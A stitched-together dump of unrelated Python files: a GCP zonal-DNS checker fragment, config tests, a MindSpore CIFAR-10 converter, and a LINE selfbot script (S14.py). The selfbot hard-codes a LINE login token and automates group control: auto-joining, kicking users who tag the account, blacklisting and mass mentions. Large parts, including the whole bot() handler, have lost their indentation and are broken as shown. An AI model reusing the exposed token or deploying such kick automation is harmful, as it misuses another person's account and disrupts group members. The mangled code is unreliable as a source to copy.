            # as errors here -- the check is simply skipped.
            _log.info('Cannot access %s', project)
            return
        enabled = False
        metadata = json.loads(out)
        # NOTE(review): metadata['commonInstanceMetadata'] raises KeyError if
        # the key is absent; presumably the --format flag guarantees its
        # presence when metadata is non-empty -- confirm.
        if (metadata and metadata['commonInstanceMetadata']
                and metadata['commonInstanceMetadata']['items']):
            for item in metadata['commonInstanceMetadata']['items']:
                # Metadata key casing ('Vm') intentionally differs from the
                # config key casing ('VM') used below.
                if item['key'] == 'EnableVmZonalDNS':
                    enabled = item['value'].lower() == 'yes'
        desired = config.get('EnableVMZonalDNS', False)
        if desired == enabled:
            _log.info(
                'Project %s %s is already configured', project, self.name())
            return
        if not fix:
            _log.info(
                'Will not --fix %s, needs to change EnableVMZonalDNS to %s',
                project, desired)
            self.results.report_error(project, self.name())
            return
        # desired != enabled is already guaranteed by the early return above.
        if desired != enabled:
            _log.info('Updating project %s EnableVMZonalDNS from %s to %s',
                      project, enabled, desired)
            self.update(project, desired)
    def update(self, project, desired):
        """Add or remove the EnableVmZonalDNS metadata entry on the project."""
        if desired:
            err = self.rl_exec.call(
                ['gcloud', 'compute', 'project-info', 'add-metadata',
                 '--metadata=EnableVmZonalDNS=Yes',
                 '--project=' + project],
                stdout=open('/dev/null', 'w'))
        else:
            err = self.rl_exec.call(
                ['gcloud', 'compute', 'project-info', 'remove-metadata',
                 '--keys=EnableVmZonalDNS',
                 '--project=' + project],
                stdout=open('/dev/null', 'w'))
        if not err:
            _log.info('Updated zonal DNS for %s: %s', project, desired)
            self.results.report_updated(project)
        else:
            _log.info('Could not update zonal DNS for %s', project)
            self.results.report_error(project, 'update ' + self.name())
def main():
    """Entry point: parse CLI flags, configure logging, run the checker."""
    args = parse_args()
    log_level = logging.DEBUG if args.verbose else logging.INFO
    logging.basicConfig(
        format="%(asctime)s %(levelname)s %(name)s] %(message)s",
        level=log_level)
    checker = Checker(args.config)
    checker.run(args.filter, args.fix)


if __name__ == '__main__':
    main()
|
test_config.py
|
import asyncio
import copy
import pytest
import random
import yaml
from staidelta.util.config import create_default_staidelta_config, initial_config_file, load_config, save_config
from staidelta.util.path import mkdir
from multiprocessing import Pool
from pathlib import Path
from threading import Thread
from time import sleep
from typing import Dict
# Commented-out lines are preserved to aid in debugging the multiprocessing tests
# import logging
# import os
# import threading
# log = logging.getLogger(__name__)
def write_config(root_path: Path, config: Dict):
    """
    Sleep for a random sub-second interval, then persist the config data.
    With a large config, save_config() is expected to need multiple writes,
    which is exactly the interleaving this helper tries to provoke.
    """
    delay = random.random()
    sleep(delay)
    # (Per-thread debug logging was removed here; re-add pid/thread-id
    # logging if the multiprocessing tests need debugging again.)
    save_config(root_path=root_path, filename="config.yaml", config_data=config)
def read_and_compare_config(root_path: Path, default_config: Dict):
    """
    Pause briefly, read the config back, and verify it equals the default
    config data. A partially-written or corrupt config file makes
    load_config fail or yields data that fails the comparison.
    """
    # The reader and writer threads each wait a random amount in an
    # attempt to interleave their execution differently on every run.
    sleep(random.random())
    loaded: Dict = load_config(root_path=root_path, filename="config.yaml")
    assert len(loaded) > 0
    assert loaded == default_config
async def create_reader_and_writer_tasks(root_path: Path, default_config: Dict):
    """
    Launch one writer and one reader thread and block until both finish.
    """
    workers = [
        Thread(target=write_config,
               kwargs={"root_path": root_path, "config": default_config}),
        Thread(target=read_and_compare_config,
               kwargs={"root_path": root_path, "default_config": default_config}),
    ]
    for worker in workers:
        worker.start()
    for worker in workers:
        worker.join()
def run_reader_and_writer_tasks(root_path: Path, default_config: Dict):
    """
    Subprocess entry point. This function spins-off threads to perform
    read/write tasks concurrently, possibly leading to synchronization
    issues accessing config data.
    """
    # asyncio.get_event_loop() is deprecated (and eventually an error) when
    # no loop is running; asyncio.run() creates and tears down a fresh loop,
    # which is the right behavior for a one-shot subprocess entry point.
    asyncio.run(create_reader_and_writer_tasks(root_path, default_config))
class TestConfig:
    """Unit tests for staidelta config creation, loading, and saving."""
    @pytest.fixture(scope="function")
    def root_path_populated_with_config(self, tmpdir) -> Path:
        """
        Create a temp directory and populate it with a default config.yaml.
        Returns the root path containing the config.
        """
        root_path: Path = Path(tmpdir)
        create_default_staidelta_config(root_path)
        return Path(root_path)
    @pytest.fixture(scope="function")
    def default_config_dict(self) -> Dict:
        """
        Returns a dictionary containing the default config.yaml contents.
        """
        content: str = initial_config_file("config.yaml")
        config: Dict = yaml.safe_load(content)
        return config
    def test_create_config_new(self, tmpdir):
        """
        Test create_default_staidelta_config() as in a first run scenario.
        """
        # When: using a clean directory
        root_path: Path = Path(tmpdir)
        config_file_path: Path = root_path / "config" / "config.yaml"
        # Expect: config.yaml doesn't exist
        assert config_file_path.exists() is False
        # When: creating a new config
        create_default_staidelta_config(root_path)
        # Expect: config.yaml exists
        assert config_file_path.exists() is True
        expected_content: str = initial_config_file("config.yaml")
        assert len(expected_content) > 0
        with open(config_file_path, "r") as f:
            actual_content: str = f.read()
            # Expect: config.yaml contents are seeded with initial contents
            assert actual_content == expected_content
    def test_create_config_overwrite(self, tmpdir):
        """
        Test create_default_staidelta_config() when overwriting an existing config.yaml.
        """
        # When: using a clean directory
        root_path: Path = Path(tmpdir)
        config_file_path: Path = root_path / "config" / "config.yaml"
        mkdir(config_file_path.parent)
        # When: config.yaml already exists with content
        with open(config_file_path, "w") as f:
            f.write("Some config content")
        # Expect: config.yaml exists
        assert config_file_path.exists() is True
        # When: creating a new config
        create_default_staidelta_config(root_path)
        # Expect: config.yaml exists
        assert config_file_path.exists() is True
        expected_content: str = initial_config_file("config.yaml")
        assert len(expected_content) > 0
        with open(config_file_path, "r") as f:
            actual_content: str = f.read()
            # Expect: config.yaml contents are overwritten with initial contents
            assert actual_content == expected_content
    def test_load_config(self, root_path_populated_with_config, default_config_dict):
        """
        Call load_config() with a default config and verify a few values are set to the expected values.
        """
        root_path: Path = root_path_populated_with_config
        # When: loading a newly created config
        config: Dict = load_config(root_path=root_path, filename="config.yaml")
        assert config is not None
        # Expect: config values should match the defaults (from a small sampling)
        assert config["daemon_port"] == default_config_dict["daemon_port"] == 56600
        assert config["self_hostname"] == default_config_dict["self_hostname"] == "localhost"
        assert (
            config["farmer"]["network_overrides"]["constants"]["mainnet"]["GENESIS_CHALLENGE"]
            == default_config_dict["farmer"]["network_overrides"]["constants"]["mainnet"]["GENESIS_CHALLENGE"]
            == "ccd5bb71183532bff220ba46c268991a3ff07eb358e8255a65c30a2dce0e5fbb"
        )
    def test_load_config_exit_on_error(self, tmpdir):
        """
        Call load_config() with an invalid path. Behavior should be dependent on the exit_on_error flag.
        """
        root_path: Path = tmpdir
        config_file_path: Path = root_path / "config" / "config.yaml"
        # When: config file path points to a directory
        mkdir(config_file_path)
        # When: exit_on_error is True
        # Expect: load_config will exit
        with pytest.raises(SystemExit):
            _ = load_config(root_path=root_path, filename=config_file_path, exit_on_error=True)
        # When: exit_on_error is False
        # Expect: load_config will raise an exception
        with pytest.raises(ValueError):
            _ = load_config(root_path=root_path, filename=config_file_path, exit_on_error=False)
    def test_save_config(self, root_path_populated_with_config, default_config_dict):
        """
        Test modifying the config and saving it to disk. The modified value(s) should be present after
        calling load_config().
        """
        root_path: Path = root_path_populated_with_config
        config: Dict = copy.deepcopy(default_config_dict)
        # When: modifying the config
        config["harvester"]["farmer_peer"]["host"] = "oldmacdonald.eie.io"
        # Sanity check that we didn't modify the default config
        assert config["harvester"]["farmer_peer"]["host"] != default_config_dict["harvester"]["farmer_peer"]["host"]
        # When: saving the modified config
        save_config(root_path=root_path, filename="config.yaml", config_data=config)
        # Expect: modifications should be preserved in the config read from disk
        loaded: Dict = load_config(root_path=root_path, filename="config.yaml")
        assert loaded["harvester"]["farmer_peer"]["host"] == "oldmacdonald.eie.io"
    def test_multiple_writers(self, root_path_populated_with_config, default_config_dict):
        """
        Test whether multiple readers/writers encounter data corruption. When using non-atomic operations
        to write to the config, partial/incomplete writes can cause readers to yield bad/corrupt data.
        Access to config.yaml isn't currently synchronized, so the best we can currently hope for is that
        the file contents are written-to as a whole.
        """
        # Artificially inflate the size of the default config. This is done to (hopefully) force
        # save_config() to require multiple writes. When save_config() was using shutil.move()
        # multiple writes were observed, leading to read failures when data was partially written.
        default_config_dict["xyz"] = "x" * 32768
        root_path: Path = root_path_populated_with_config
        save_config(root_path=root_path, filename="config.yaml", config_data=default_config_dict)
        num_workers: int = 30
        args = list(map(lambda _: (root_path, default_config_dict), range(num_workers)))
        # Spin-off several processes (not threads) to read and write config data. If any
        # read failures are detected, the failing process will assert.
        with Pool(processes=num_workers) as pool:
            res = pool.starmap_async(run_reader_and_writer_tasks, args)
            res.get(timeout=10)
|
cifar10_to_mr.py
|
# Copyright 2019 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""
Cifar10 convert tool for MindRecord.
"""
from importlib import import_module
import os
import numpy as np
from mindspore import log as logger
from .cifar10 import Cifar10
from ..common.exceptions import PathNotExistsError
from ..filewriter import FileWriter
from ..shardutils import check_filename, ExceptionThread, SUCCESS, FAILED
try:
cv2 = import_module("cv2")
except ModuleNotFoundError:
cv2 = None
__all__ = ['Cifar10ToMR']
class Cifar10ToMR:
    """
    A class to transform from cifar10 to MindRecord.

    Args:
        source (str): the cifar10 directory to be transformed.
        destination (str): the MindRecord file path to transform into.

    Raises:
        ValueError: If source or destination is invalid.
    """
    def __init__(self, source, destination):
        check_filename(source)
        self.source = source
        # Verify both the training batches (data_batch_*) and the test
        # batch (test_batch) exist before accepting the directory.
        files = os.listdir(self.source)
        train_data_flag = False
        test_data_flag = False
        for file in files:
            if file.startswith("data_batch_"):
                train_data_flag = True
            if file.startswith("test_batch"):
                test_data_flag = True
        if not train_data_flag:
            raise PathNotExistsError("data_batch_*")
        if not test_data_flag:
            raise PathNotExistsError("test_batch")
        check_filename(destination)
        self.destination = destination
        self.writer = None
    def run(self, fields=None):
        """
        Execute transformation from cifar10 to MindRecord.

        Args:
            fields (list[str], optional): A list of index fields, e.g.["label"] (default=None).

        Returns:
            MSRStatus, whether cifar10 is successfully transformed to MindRecord.
        """
        if fields and not isinstance(fields, list):
            raise ValueError("The parameter fields should be None or list")
        cifar10_data = Cifar10(self.source, False)
        cifar10_data.load_data()
        images = cifar10_data.images
        logger.info("train images: {}".format(images.shape))
        labels = cifar10_data.labels
        logger.info("train images label: {}".format(labels.shape))
        # NOTE(review): the test split is exposed via a 'Test' attribute --
        # confirm against the Cifar10 class definition.
        test_images = cifar10_data.Test.images
        logger.info("test images: {}".format(test_images.shape))
        test_labels = cifar10_data.Test.labels
        logger.info("test images label: {}".format(test_labels.shape))
        data_list = _construct_raw_data(images, labels)
        test_data_list = _construct_raw_data(test_images, test_labels)
        # Train and test splits are written to two separate MindRecord
        # files: <destination> and <destination>_test.
        if _generate_mindrecord(self.destination, data_list, fields, "img_train") != SUCCESS:
            return FAILED
        if _generate_mindrecord(self.destination + "_test", test_data_list, fields, "img_test") != SUCCESS:
            return FAILED
        return SUCCESS
    def transform(self, fields=None):
        """
        Encapsulate the run function to exit normally.

        Runs self.run in an ExceptionThread so that a failure inside the
        worker is re-raised in the caller instead of killing the process.
        """
        t = ExceptionThread(target=self.run, kwargs={'fields': fields})
        t.daemon = True
        t.start()
        t.join()
        if t.exitcode != 0:
            raise t.exception
        return t.res
def _construct_raw_data(images, labels):
    """
    Construct raw data from cifar10 data.

    Args:
        images (list): image list from cifar10.
        labels (list): label list from cifar10.

    Returns:
        list[dict], data dictionary constructed from cifar10.

    Raises:
        ModuleNotFoundError: if opencv-python is not installed.
    """
    if not cv2:
        raise ModuleNotFoundError("opencv-python module not found, please use pip install it.")
    raw_data = []
    for i, img in enumerate(images):
        # np.int was removed in NumPy 1.24; the builtin int is the
        # documented replacement and behaves identically here.
        label = int(labels[i][0])
        # Reorder channels RGB -> BGR before encoding, since OpenCV
        # expects BGR input.
        _, img = cv2.imencode(".jpeg", img[..., [2, 1, 0]])
        row_data = {"id": int(i),
                    "data": img.tobytes(),
                    "label": label}
        raw_data.append(row_data)
    return raw_data
def _generate_mindrecord(file_name, raw_data, fields, schema_desc):
    """
    Generate MindRecord file from raw data.

    Args:
        file_name (str): File name of MindRecord File.
        raw_data (dict): dict of raw data.
        fields (list[str]): Fields would be set as index which
            could not belong to blob fields and type could not be 'array' or 'bytes'.
        schema_desc (str): String of schema description.

    Returns:
        MSRStatus, whether successfully written into MindRecord.
    """
    # Fixed schema: id/label as int64 scalars, the JPEG image as a bytes blob.
    schema = {"id": {"type": "int64"}, "label": {"type": "int64"},
              "data": {"type": "bytes"}}
    logger.info("transformed MindRecord schema is: {}".format(schema))
    # Single output shard; commit() finalizes the file and returns the status.
    writer = FileWriter(file_name, 1)
    writer.add_schema(schema, schema_desc)
    if fields and isinstance(fields, list):
        writer.add_index(fields)
    writer.write_raw_data(raw_data)
    return writer.commit()
|
S14.py
|
# -*- coding: utf-8 -*-
import KRIS
from KRIS.lib.curve.ttypes import *
from datetime import datetime
import time, random, sys, ast, re, os, io, json, subprocess, threading, string, codecs, requests, ctypes, urllib, urllib2, urllib3, wikipedia, tempfile
from bs4 import BeautifulSoup
from urllib import urlopen
import requests
from io import StringIO
from threading import Thread
#from gtts import gTTS
from googletrans import Translator
# Log in to LINE through the KRIS client wrapper.
kr = KRIS.LINE()
#kr.login(qr=True)
# SECURITY(review): hard-coded auth token checked into source -- anyone with
# this file can hijack the account. Move it to an environment variable or a
# config file, and rotate this credential.
kr.login(token="EoMxIUUhy07LRc4ECkr5.nqZhqiZgZilGvU4eyth5jq.1Ij6rXBNjXEoOMC7MnB1PFTYOEmZzTfv8ExwSo/uCLY=")
kr.loginResult()
print "╠══TeamBotAdhi══╠"
# Python 2 only: re-expose setdefaultencoding and force UTF-8 so the
# non-ASCII message strings below do not raise UnicodeDecodeError.
reload(sys)
sys.setdefaultencoding('utf-8')
helpmsg =""" ╠══TeamBotAdhi══╠
╠═════════════
owner : ༺T-B-A༻ �
╠═════════════
google (text)
playstore (text)
instagram (username)
wikipedia (text)
idline (text)
time
image (text)
runtime
Restart
lirik (text)
Cancel on/off
Simisimi:on/off
Read on/off
Getinfo @
Getcontact @
Cium @
speed
Friendlist
keyset
keygrup
mode on/off
protect on/off
qr on/off
invite on/off
cancel on/off
Me
Myname:
Mybio:
Mypict
Mycover
My copy @
My backup
Getgroup image
Getmid @
Getprofile @
Getinfo @
Getname @
Getbio @
Getpict @
Getcover @
Sun (Mention)
Sider on/off (Lurking)
intip/Ciduk (Lurkers)
Micadd @
Micdel @
Mimic on/off
Miclist
╔═════════════
╔═════════════
╠owner : ༺T-B-A༻ �
╠line://ti/p/~jkp4678
╚═════════════"""
helpset ="""╠══TeamBotAdhi══╠
╔═════════════
║║ Owner : ༺T-B-A༻
║╔════════════
contact on/off
autojoin on/off
auto leave on/off
autoadd on/off
like friend
link on
respon on/off
Read on/off
simisimi on/off
Datang on/off
Pamit on/off
Respontag on/off
Kicktag on/off
╠═════════════
╠Creator: ༺T-B-A༻ �
╠line://ti/p/~jkp4678
╚═════════════"""
helpgrup ="""
╔═════════════
╠╠══TeamBotAdhi══╠
║line://ti/p/~jkp4678
║ Owner : ༺T-B-A༻ �
╠═════════════
Link on
Url
Cancel
Gcreator
Kick @
Cium @
Gname:
Gbroadcast:
Cbroadcast:
Infogrup
Gruplist
Friendlist
Blacklist
Ban @
Unban @
Clearban
Banlist
Contact ban
Midban
╠═════════════╠
Id@en
En@id
Id@jp
Jp@id
Id@th
Th@id
Id@ar
Ar@id
Id@ko
Ko@id
Say-id
Say-en
Say-jp
╠════════════
╠══TeamBotAdhi══╠
╠owner : ༺T-B-A༻ �
╠Creator by : ༺T-B-A༻ �
╠line://ti/p/~jkp4678
╚═════════════"""
# Active bot clients (currently only the single logged-in account).
KAC=[kr]
mid = kr.getProfile().mid
# Accounts treated as bots, plus the hard-coded administrator mids.
Bots=[mid]
admin=["u350cc7408cc6cc82e056ee046131f925","uc2e8b426f6591045943eae5304e67c32",mid]
# Global feature-flag / state dictionary consulted throughout bot().
wait = {
    "likeOn":False,
    "alwayRead":False,
    "detectMention":True,
    "kickMention":False,
    "steal":True,
    'pap':{},
    'invite':{},
    "spam":{},
    'contact':False,
    'autoJoin':True,
    'autoCancel':{"on":False,"members":1},
    'leaveRoom':True,
    'timeline':False,
    'autoAdd':True,
    'message':"""Tanks For You add kak""",
    "lang":"JP",
    "comment":"👉ąµţ๏ℓɨЌ€ 😊\n\n☆º°╠══TeamBotAdhi═)═_^ω^)\n╠══TeamBotAdhi══╠\n👈://line.me/ti/p/~jkp4678 «««",
    "commentOn":False,
    "commentBlack":{},
    "wblack":False,
    "dblack":False,
    "clock":False,
    # NOTE(review): duplicate key -- the second "cNames" entry silently
    # overwrites the first; one of them is dead.
    "cNames":"",
    "cNames":"",
    "Wc":False,
    "Lv":False,
    'MENTION':True,
    "blacklist":{},
    "wblacklist":False,
    "dblacklist":False,
    "protect":False,
    "cancelprotect":False,
    "inviteprotect":False,
    "linkprotect":False,
}
# Read-receipt ("sider"/lurker) tracking state, keyed by chat id.
wait2 = {
    "readPoint":{},
    "readMember":{},
    "setTime":{},
    "ROM":{}
}
# Mimic mode: when enabled, the bot repeats messages from target users.
mimic = {
    "copy":False,
    "copy2":False,
    "status":False,
    "target":{}
}
# Per-chat SimiSimi chatbot toggle.
settings = {
    "simiSimi":{}
}
res = {
    'num':{},
    'us':{},
    'au':{},
}
# setTime aliases wait2['setTime']; the first empty-dict assignment is
# immediately replaced and has no effect.
setTime = {}
setTime = wait2['setTime']
# Startup timestamp used by the runtime/uptime command.
mulai = time.time()
# Snapshot of the bot profile, kept for the "My backup" restore command.
contact = kr.getProfile()
backup = kr.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
def restart_program():
    """Replace the current process with a fresh copy of this script."""
    # os.execl never returns: the running image is swapped for a new
    # interpreter launched with the same argument vector.
    interpreter = sys.executable
    os.execl(interpreter, interpreter, *sys.argv)
def download_page(url):
    """Fetch *url* and return the response body as a string.

    Handles both Python 3 (urllib.request) and Python 2 (urllib2).
    On Python 3 a failure is printed and None is implicitly returned;
    on Python 2 a failure returns the string "Page Not found".
    """
    version = (3, 0)
    cur_version = sys.version_info
    if cur_version >= version:  # Python 3.0 or above
        # BUG FIX: the original said "import urllib,request" and then called
        # "urllib,request.Request(...)" -- a tuple expression referencing a
        # nonexistent top-level module, so this branch always raised
        # NameError. urllib.request is the correct module.
        import urllib.request
        try:
            headers = {}
            headers['User-Agent'] = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
            req = urllib.request.Request(url, headers=headers)
            resp = urllib.request.urlopen(req)
            respData = str(resp.read())
            return respData
        except Exception as e:
            print(str(e))
    else:  # Python 2.x
        import urllib2
        try:
            headers = {}
            headers['User-Agent'] = "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17"
            req = urllib2.Request(url, headers=headers)
            response = urllib2.urlopen(req)
            page = response.read()
            return page
        except:
            return "Page Not found"
#Finding 'Next Image' from the given raw page
def _images_get_next_item(s):
start_line = s.find('rg_di')
if start_line == -1: #If no links are found then give an error!
end_quote = 0
link = "no_links"
return link, end_quote
else:
start_line = s.find('"class="rg_meta"')
start_content = s.find('"ou"',start_line+90)
end_content = s.find(',"ow"',start_content-90)
content_raw = str(s[start_content+6:end_content-1])
return content_raw, end_content
def sendAudioWithURL(self, to_, url):
    """Download the audio file at *url* to a temp path and send it to *to_*.

    Raises:
        Exception: if the HTTP download fails or sendAudio errors out.
    """
    import shutil  # not imported at module scope; keep the fix local
    # BUG FIX: the original called bare randint() (only the random module is
    # imported, so it raised NameError) and referenced shutil without any
    # import. It also opened the file in text mode, corrupting binary data
    # on Windows, and never closed the handle.
    path = '%s/pythonLine-%i.data' % (tempfile.gettempdir(), random.randint(0, 9))
    r = requests.get(url, stream=True)
    if r.status_code == 200:
        with open(path, 'wb') as f:
            shutil.copyfileobj(r.raw, f)
    else:
        raise Exception('Download audio failure.')
    try:
        self.sendAudio(to_, path)
    except Exception as e:
        raise e
#Getting all links with the help of '_images_get_next_image'
def _images_get_all_items(page):
    """Collect every image link found in *page* via _images_get_next_item."""
    items = []
    while True:
        link, offset = _images_get_next_item(page)
        if link == "no_links":
            break
        items.append(link)
        # Brief pause to slow down subsequent image-download requests.
        time.sleep(0.1)
        # Continue scanning from just past the link we consumed.
        page = page[offset:]
    return items
def download_page(url):
    """Fetch *url* and return the response body as a string.

    NOTE(review): this is a duplicate of the download_page defined earlier
    in the file; this later definition is the one that takes effect. The
    duplicates should be consolidated.
    """
    version = (3, 0)
    cur_version = sys.version_info
    if cur_version >= version:  # Python 3.0 or above
        # BUG FIX: "import urllib,request" / "urllib,request.Request(...)"
        # referenced a nonexistent top-level module and always raised
        # NameError; urllib.request is the correct module.
        import urllib.request
        try:
            headers = {}
            headers['User-Agent'] = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
            req = urllib.request.Request(url, headers=headers)
            resp = urllib.request.urlopen(req)
            respData = str(resp.read())
            return respData
        except Exception as e:
            print(str(e))
    else:  # Python 2.x
        import urllib2
        try:
            headers = {}
            headers['User-Agent'] = "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17"
            req = urllib2.Request(url, headers=headers)
            response = urllib2.urlopen(req)
            page = response.read()
            return page
        except:
            return "Page Not found"
def upload_tempimage(client):
    '''
    Upload a picture of a kitten. We don't ship one, so get creative!
    '''
    # NOTE(review): 'album' and 'image_path' are not defined anywhere in this
    # file -- this function raises NameError unless they exist as globals
    # injected elsewhere. Confirm before use.
    config = {
        'album': album,
        'name': 'bot auto upload',
        'title': 'bot auto upload',
        'description': 'bot auto upload'
    }
    print("Uploading image... ")
    # client is presumably an Imgur-style client exposing
    # upload_from_path(path, config=..., anon=...) -- verify.
    image = client.upload_from_path(image_path, config=config, anon=False)
    print("Done")
    print()
def summon(to, nama):
    # Send a "tag all" message that @-mentions every mid listed in nama.
    # Builds the LINE MENTION contentMetadata JSON by hand: each mentionee
    # gets start/end character offsets (S/E) into the message text plus its
    # mid (M).
    aa = ""
    bb = ""
    # Offsets of the first "@x" placeholder inside the framed message text.
    strt = int(14)
    akh = int(14)
    nm = nama
    for mm in nm:
        akh = akh + 2
        aa += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(mm)+"},"""
        strt = strt + 6
        akh = akh + 4
        bb += "\xe2\x95\xa0 @x \n"
    # Drop the trailing comma from the mentionees JSON array.
    aa = (aa[:int(len(aa)-1)])
    msg = Message()
    msg.to = to
    # Box-drawing frame (UTF-8 byte escapes) around one "@x" line per mentionee.
    msg.text = "\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\n"+bb+"\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90"
    msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+aa+']}','EMTVER':'4'}
    print "[Command] Tag All"
    try:
        kr.sendMessage(msg)
    except Exception as error:
        print error
def waktu(secs):
    """Format a duration given in seconds as 'HH Jam MM Menit SS Detik'."""
    total_minutes, seconds = divmod(secs, 60)
    hours, minutes = divmod(total_minutes, 60)
    return '%02d Jam %02d Menit %02d Detik' % (hours, minutes, seconds)
def cms(string, commands):
    """Return True if *string* exactly matches one of *commands*.

    NOTE(review): the original iterated a list of command prefixes
    ("+", "@", "/", ">", ...) but never used the prefix variable, so the
    match was always exact and the dead outer loop merely repeated the
    same comparison 13 times. The prefix list is dropped here, preserving
    the observable behavior (exact match). If prefixed commands such as
    "/help" were the intent, that would be a behavior change and needs a
    separate, deliberate fix.
    """
    return any(string == command for command in commands)
def sendMessage(to, text, contentMetadata={}, contentType=0):
    # NOTE(review): mutable default argument ({}) is shared across calls;
    # left unchanged here, but callers must not mutate contentMetadata.
    # NOTE(review): 'profile' and 'messageReq' are not defined in this file,
    # and the Message that is built here is never actually sent -- only the
    # per-chat counter is bumped. Presumably incomplete; confirm intent.
    mes = Message()
    mes.to, mes.from_ = to, profile.mid
    mes.text = text
    mes.contentType, mes.contentMetadata = contentType, contentMetadata
    if to not in messageReq:
        messageReq[to] = -1
    messageReq[to] += 1
def bot(op):
try:
if op.type == 0:
return
if op.type == 5:
if wait["autoAdd"] == True:
kr.findAndAddContactsByMid(op.param1)
if (wait["message"] in [""," ","\n",None]):
pass
else:
kr.sendText(op.param1,str(wait["message"]))
if op.type == 25:
msg = op.message
if msg.from_ in mimic["target"] and mimic["status"] == True and mimic["target"][msg.from_] == True:
text = msg.text
if text is not None:
kr.sendText(msg.to,text)
if op.type == 13:
print op.param3
if op.param3 in mid:
if op.param2 in admin:
kr.acceptGroupInvitation(op.param1)
if op.type == 13:
if mid in op.param3:
if wait["autoJoin"] == True:
if op.param2 in Bots or admin:
kr.acceptGroupInvitation(op.param1)
else:
kr.rejectGroupInvitation(op.param1)
else:
print "autoJoin is Off"
if op.type == 19:
if op.param3 in admin:
kr.kickoutFromGroup(op.param1,[op.param2])
kr.inviteIntoGroup(op.param1,admin)
kr.inviteIntoGroup(op.param1,[op.param3])
else:
pass
if op.type == 19:
if mid in op.param3:
wait["blacklist"][op.param2] = True
if op.type == 22:
if wait["leaveRoom"] == True:
kr.leaveRoom(op.param1)
if op.type == 24:
if wait["leaveRoom"] == True:
kr.leaveRoom(op.param1)
if op.type == 25:
msg = op.message
if msg.toType == 0:
msg.to = msg.from_
if msg.from_ == mid:
if "join:" in msg.text:
list_ = msg.text.split(":")
try:
kr.acceptGroupInvitationByTicket(list_[1],list_[2])
G = kr.getGroup(list_[1])
G.preventJoinByTicket = True
kr.updateGroup(G)
except:
kr.sendText(msg.to,"error")
if msg.toType == 1:
if wait["leaveRoom"] == True:
kr.leaveRoom(msg.to)
if msg.contentType == 16:
url = msg.contentMetadata["postEndUrl"]
kr.like(url[25:58], url[66:], likeType=1001)
if op.type == 25:
msg = op.message
if msg.from_ in mimic["target"] and mimic["status"] == True and mimic["target"][msg.from_] == True:
text = msg.text
if text is not None:
kr.sendText(msg.to,text)
if op.type == 26:
msg = op.message
if msg.to in settings["simiSimi"]:
if settings["simiSimi"][msg.to] == True:
if msg.text is not None:
text = msg.text
r = requests.get("http://api.ntcorp.us/chatbot/v1/?text=" + text.replace(" ","+") + "&key=beta1.nt")
data = r.text
data = json.loads(data)
if data['status'] == 200:
if data['result']['result'] == 100:
kr.sendText(msg.to, "[From Simi]\n" + data['result']['response'].encode('utf-8'))
if 'MENTION' in msg.contentMetadata.keys() != None:
if wait["detectMention"] == True:
contact = kr.getContact(msg.from_)
cName = contact.displayName
balas = ["Don't Tag Me! iam Bussy!, ",cName + "Ada perlu apa, ?",cName + " pc aja klo urgent! sedang sibuk,", "kenapa, ", cName + " kangen?","kangen bilang gak usah tag tag, " + cName, "knp?, " + cName, "apasi?, " + cName + "?", "pulang gih, " + cName + "?","ada apa lo jones , ?" + cName + "Tersangkut -_-"]
ret_ = "." + random.choice(balas)
name = re.findall(r'@(\w+)', msg.text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
for mention in mentionees:
if mention['M'] in Bots:
kr.sendText(msg.to,ret_)
break
if 'MENTION' in msg.contentMetadata.keys() != None:
if wait["kickMention"] == True:
contact = kr.getContact(msg.from_)
cName = contact.displayName
balas = ["Dont Tag Me!! Im Busy, ",cName + " Ngapain Ngetag?, ",cName + " Nggak Usah Tag-Tag! Kalo Penting Langsung Pc Aja, ", "-_-, ","Adhi lagi off, ", cName + " Kenapa Tag saya?, ","SPAM PC aja, " + cName, "Jangan Suka Tag gua, " + cName, "Kamu siapa, " + cName + "?", "Ada Perlu apa, " + cName + "?","Tag doang tidak perlu., "]
ret_ = "[Auto Respond] " + random.choice(balas)
name = re.findall(r'@(\w+)', msg.text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
for mention in mentionees:
if mention['M'] in Bots:
kr.sendText(msg.to,ret_)
kr.kickoutFromGroup(msg.to,[msg.from_])
break
if msg.contentType == 13:
if wait['invite'] == True:
_name = msg.contentMetadata["displayName"]
invite = msg.contentMetadata["mid"]
groups = kr.getGroup(msg.to)
pending = groups.invitee
targets = []
for s in groups.members:
if _name in s.displayName:
kr.sendText(msg.to, _name + " Berada DiGrup Ini")
else:
targets.append(invite)
if targets == []:
pass
else:
for target in targets:
try:
kr.findAndAddContactsByMid(target)
kr.inviteIntoGroup(msg.to,[target])
kr.sendText(msg.to,"Invite " + _name)
wait['invite'] = False
break
except:
kr.sendText(msg.to,"Error")
wait['invite'] = False
break
#if msg.contentType == 13:
# if wait["steal"] == True:
# _name = msg.contentMetadata["displayName"]
# copy = msg.contentMetadata["mid"]
# groups = kr.getGroup(msg.to)
# pending = groups.invitee
# targets = []
